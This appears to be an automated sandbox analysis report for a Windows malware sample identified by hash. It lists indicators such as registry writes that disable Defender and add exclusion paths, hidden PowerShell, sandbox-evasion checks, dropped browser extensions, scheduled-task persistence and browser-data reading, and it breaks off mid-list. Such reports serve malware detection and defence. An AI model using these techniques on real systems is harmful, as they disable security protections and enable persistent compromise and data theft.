Analysis
-
max time kernel
164s -
max time network
173s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
15/07/2024, 05:07
Static task
static1
Behavioral task
behavioral1
Sample
c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe
Resource
win7-20240704-en
General
-
Target
c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe
-
Size
7.3MB
-
MD5
6703f9961b616ee37130065545ccf5df
-
SHA1
a8568da6d32ed551763a5de3bffac7578958036b
-
SHA256
c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3
-
SHA512
38063a127f3c7bbeb0d9d59227117a0c8836a72cf31c7cf6703e9a8adc644e2452a193d596d2998f5d22f794735e4918ecc335da807395e81b272912bbd53bfd
-
SSDEEP
98304:91OLrUDYqBxvBjQaHAS/aPmZ5wjT1yRqMtVxY0OO9aP2MrJ/RnlY/NlN//uxb5K2:91O8DrMaH7aFsqC40d6LDlY/utcw/Oq
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\bpNowFaEeWbSfYmu = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\bpNowFaEeWbSfYmu = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HfWdCszlsWLFcdllTSR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nXmjFVOHU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\utOkvPMviNUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tuyZfYaPCcjxC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tuyZfYaPCcjxC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hVWjTjnIaijqmUVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ANKVsfPAuVEU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HfWdCszlsWLFcdllTSR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ANKVsfPAuVEU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nXmjFVOHU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hVWjTjnIaijqmUVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\bpNowFaEeWbSfYmu = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\bpNowFaEeWbSfYmu = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\utOkvPMviNUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 2660 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 1688 powershell.exe 2784 powershell.exe 1612 powershell.EXE 2344 powershell.EXE 1708 powershell.exe 768 powershell.EXE 3012 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Control Panel\International\Geo\Nation xTbLWfD.exe -
Executes dropped EXE 4 IoCs
pid Process 2120 Install.exe 2468 Install.exe 2872 hLgFofY.exe 2556 xTbLWfD.exe -
Loads dropped DLL 23 IoCs
pid Process 2240 c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe 2120 Install.exe 2120 Install.exe 2120 Install.exe 2120 Install.exe 2468 Install.exe 2468 Install.exe 2468 Install.exe 2680 WerFault.exe 2680 WerFault.exe 2680 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2660 rundll32.exe 2236 WerFault.exe 2660 rundll32.exe 2236 WerFault.exe 2660 rundll32.exe 2236 WerFault.exe 2112 WerFault.exe 2660 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json xTbLWfD.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json xTbLWfD.exe -
Drops file in System32 directory 24 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat xTbLWfD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 xTbLWfD.exe File created C:\Windows\system32\GroupPolicy\gpt.ini hLgFofY.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol xTbLWfD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xTbLWfD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 xTbLWfD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 xTbLWfD.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol hLgFofY.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini hLgFofY.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xTbLWfD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 xTbLWfD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE xTbLWfD.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol hLgFofY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 xTbLWfD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE xTbLWfD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 xTbLWfD.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\nXmjFVOHU\RyMCYi.dll xTbLWfD.exe File created C:\Program Files (x86)\tuyZfYaPCcjxC\srEdjTE.dll xTbLWfD.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xTbLWfD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja xTbLWfD.exe File created C:\Program Files (x86)\utOkvPMviNUn\ELgbBBp.dll xTbLWfD.exe File created C:\Program Files (x86)\nXmjFVOHU\GJRclpu.xml xTbLWfD.exe File created C:\Program Files (x86)\ANKVsfPAuVEU2\MTHlGcK.xml xTbLWfD.exe File created C:\Program Files (x86)\tuyZfYaPCcjxC\HXeXFKo.xml xTbLWfD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xTbLWfD.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak xTbLWfD.exe File created C:\Program Files (x86)\ANKVsfPAuVEU2\mRWyIMpCXYTiY.dll xTbLWfD.exe File created C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\YsUrXZr.dll xTbLWfD.exe File created C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\ThFUtiR.xml xTbLWfD.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bIOEZkRAagKtMyjtNl.job schtasks.exe File created C:\Windows\Tasks\fxxmGIjnSbKlnnNZc.job schtasks.exe File created C:\Windows\Tasks\JHXYugTugXnbcjp.job schtasks.exe File created C:\Windows\Tasks\wVNtBGnRpnzfZepfO.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2680 2872 WerFault.exe 39 2112 2468 WerFault.exe 29 2236 2556 WerFault.exe 183 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings xTbLWfD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-80-07-34-ab-cf\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached hLgFofY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs xTbLWfD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-80-07-34-ab-cf\WpadDecisionReason = "1" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" xTbLWfD.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{60816362-584E-4B0F-ABE7-4BD28D0CCB78}\WpadDecisionTime = d094fe4675d6da01 xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-80-07-34-ab-cf rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-80-07-34-ab-cf\WpadDecisionTime = d094fe4675d6da01 xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs xTbLWfD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{60816362-584E-4B0F-ABE7-4BD28D0CCB78}\WpadDecision = "0" xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs xTbLWfD.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000007062873275d6da01 hLgFofY.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xTbLWfD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs xTbLWfD.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0075000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ hLgFofY.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates xTbLWfD.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates xTbLWfD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" hLgFofY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ xTbLWfD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-80-07-34-ab-cf\WpadDecision = "0" xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates xTbLWfD.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-80-07-34-ab-cf\WpadDecisionTime = d094fe4675d6da01 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-80-07-34-ab-cf\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" hLgFofY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs xTbLWfD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" xTbLWfD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{60816362-584E-4B0F-ABE7-4BD28D0CCB78}\12-80-07-34-ab-cf rundll32.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2776 schtasks.exe 2668 schtasks.exe 560 schtasks.exe 3016 schtasks.exe 2084 schtasks.exe 2504 schtasks.exe 2884 schtasks.exe 2160 schtasks.exe 2676 schtasks.exe 2184 schtasks.exe 2836 schtasks.exe 2744 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 2784 powershell.exe 1612 powershell.EXE 1612 powershell.EXE 1612 powershell.EXE 2344 powershell.EXE 2344 powershell.EXE 2344 powershell.EXE 1708 powershell.exe 768 powershell.EXE 768 powershell.EXE 768 powershell.EXE 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 3012 powershell.exe 1688 powershell.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe 2556 xTbLWfD.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2784 powershell.exe Token: SeIncreaseQuotaPrivilege 2892 WMIC.exe Token: SeSecurityPrivilege 2892 WMIC.exe Token: SeTakeOwnershipPrivilege 2892 WMIC.exe Token: SeLoadDriverPrivilege 2892 WMIC.exe Token: SeSystemProfilePrivilege 2892 WMIC.exe Token: SeSystemtimePrivilege 2892 WMIC.exe Token: SeProfSingleProcessPrivilege 2892 WMIC.exe Token: SeIncBasePriorityPrivilege 2892 WMIC.exe Token: SeCreatePagefilePrivilege 2892 WMIC.exe Token: SeBackupPrivilege 2892 WMIC.exe Token: SeRestorePrivilege 2892 WMIC.exe Token: SeShutdownPrivilege 2892 WMIC.exe Token: SeDebugPrivilege 2892 WMIC.exe Token: SeSystemEnvironmentPrivilege 2892 WMIC.exe Token: SeRemoteShutdownPrivilege 2892 WMIC.exe Token: SeUndockPrivilege 2892 WMIC.exe Token: SeManageVolumePrivilege 2892 WMIC.exe Token: 33 2892 WMIC.exe Token: 34 2892 WMIC.exe Token: 35 2892 WMIC.exe Token: SeDebugPrivilege 1612 powershell.EXE Token: SeDebugPrivilege 2344 powershell.EXE Token: SeDebugPrivilege 1708 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2972 WMIC.exe Token: SeIncreaseQuotaPrivilege 2972 WMIC.exe Token: SeSecurityPrivilege 2972 WMIC.exe Token: SeTakeOwnershipPrivilege 2972 WMIC.exe Token: SeLoadDriverPrivilege 2972 WMIC.exe Token: SeSystemtimePrivilege 2972 WMIC.exe Token: SeBackupPrivilege 2972 WMIC.exe Token: SeRestorePrivilege 2972 WMIC.exe Token: SeShutdownPrivilege 2972 WMIC.exe Token: SeSystemEnvironmentPrivilege 2972 WMIC.exe Token: SeUndockPrivilege 2972 WMIC.exe Token: SeManageVolumePrivilege 2972 WMIC.exe Token: SeDebugPrivilege 768 powershell.EXE Token: SeDebugPrivilege 3012 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2032 WMIC.exe Token: SeIncreaseQuotaPrivilege 2032 WMIC.exe Token: SeSecurityPrivilege 2032 WMIC.exe Token: SeTakeOwnershipPrivilege 2032 WMIC.exe Token: SeLoadDriverPrivilege 2032 WMIC.exe Token: SeSystemtimePrivilege 2032 WMIC.exe Token: SeBackupPrivilege 2032 WMIC.exe Token: SeRestorePrivilege 2032 WMIC.exe Token: SeShutdownPrivilege 2032 WMIC.exe Token: SeSystemEnvironmentPrivilege 2032 WMIC.exe Token: SeUndockPrivilege 2032 WMIC.exe Token: SeManageVolumePrivilege 2032 WMIC.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1272 WMIC.exe Token: SeIncreaseQuotaPrivilege 1272 WMIC.exe Token: SeSecurityPrivilege 1272 WMIC.exe Token: SeTakeOwnershipPrivilege 1272 WMIC.exe Token: SeLoadDriverPrivilege 1272 WMIC.exe Token: SeSystemtimePrivilege 1272 WMIC.exe Token: SeBackupPrivilege 1272 